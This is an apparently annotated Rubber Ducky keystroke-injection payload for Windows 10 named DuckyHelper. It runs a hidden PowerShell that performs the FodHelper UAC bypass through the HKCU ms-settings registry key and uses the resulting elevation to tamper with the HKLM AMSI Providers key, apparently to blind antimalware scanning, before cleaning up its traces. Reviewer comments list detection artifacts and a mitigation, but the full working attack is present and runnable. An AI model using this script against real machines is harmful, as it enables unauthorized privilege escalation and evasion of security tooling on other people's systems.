Path: blob/master/payloads/library/execution/DuckyHelper/DuckyHelper.txt
REM DuckyHelper
REM Version 1.0
REM OS: Windows 10
REM Author: 0i41E

REM UAC bypass for privilege escalation (Method FodHelper)
REM AV will notify, but payload will still be executed
REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
REM NOTE(review): the "line 19 & 21" reference above counts lines of the original file; the REM
REM lines added in this annotated copy shift those numbers. Look for the STRING lines that type
REM "cmd.e" and "xe" -- together they hold the cmd.exe command stored in $P.
REM
REM Reviewer summary (defensive reading). Everything below is typed as keystrokes, so each
REM STRING line is literal text; the long PowerShell command is split across several STRING
REM lines purely to keep each typed chunk short, and the pieces form ONE command line.
REM   1. GUI r opens the Run dialog and starts a hidden PowerShell with -NoP -NonI -Exec Bypass.
REM   2. The typed command stores in $P a cmd.exe command that creates one subkey and removes
REM      another under HKLM:\SOFTWARE\Microsoft\AMSI\Providers, then creates
REM      HKCU:\Software\Classes\ms-settings\Shell\Open\command with an empty "DelegateExecute"
REM      value and $P as its "(default)" value, and finally starts C:\Windows\System32\fodhelper.exe
REM      hidden. Per the header this is the FodHelper UAC bypass: fodhelper.exe auto-elevates and
REM      is expected to run the ms-settings handler, i.e. $P, elevated -- confirm against the
REM      target build, the script itself only shows the registry writes and the Start-Process.
REM   3. A second PowerShell deletes the HKCU ms-settings key (cleanup) and exits.
REM Artifacts and detection points visible from this script alone:
REM   - registry create/value-set events on HKCU\Software\Classes\ms-settings\Shell\Open\command
REM     (the empty DelegateExecute value plus a (default) value starting with "cmd.exe /c");
REM   - registry changes under HKLM\SOFTWARE\Microsoft\AMSI\Providers; the cleanup step below
REM     removes only the HKCU ms-settings key, so the HKLM change is left on the host;
REM   - fodhelper.exe as the parent of cmd.exe / powershell.exe;
REM   - powershell.exe launched with -NoP -NonI -Exec Bypass from the Run dialog;
REM   - a newly attached keyboard-class USB device typing at this rate (USB/HID device control).
REM Mitigation commonly cited for this class: UAC at "Always notify" prompts instead of
REM auto-elevating; the header already states AV alerts on the payload.

DELAY 1500
REM Step 1: Run dialog -> hidden PowerShell. Flags are typed in clear and are loggable
REM via command-line auditing / PowerShell logging.
GUI r
DELAY 500
STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
DELAY 250
ENTER

DELAY 200
REM Step 2: one PowerShell command line, typed in chunks (the DELAY 100 lines only pace the
REM typing). First chunk: begins the $P assignment -- the cmd.exe command that edits
REM HKLM:\SOFTWARE\Microsoft\AMSI\Providers (requires elevation, hence it is deferred to $P).
STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
DELAY 100
STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
DELAY 100
REM Closes $P, then creates the HKCU ms-settings\Shell\Open\command key (a ";;" is typed
REM here as in the original; PowerShell tolerates the empty statement).
STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
DELAY 100
REM Sets DelegateExecute to an empty string -- the registry artifact most detection rules key on.
STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
DELAY 100
REM Sets (default) to $P, then starts fodhelper.exe hidden.
STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
DELAY 100
STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3
DELAY 100
ENTER

DELAY 5000
REM Step 3: second PowerShell (not hidden this time) removes the HKCU ms-settings key.
REM Only the HKCU key is cleaned up; nothing here reverts the HKLM AMSI Providers change.
GUI r
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass
DELAY 250
ENTER

DELAY 200
STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
DELAY 100
ENTER

DELAY 300
STRING exit
DELAY 100
ENTER

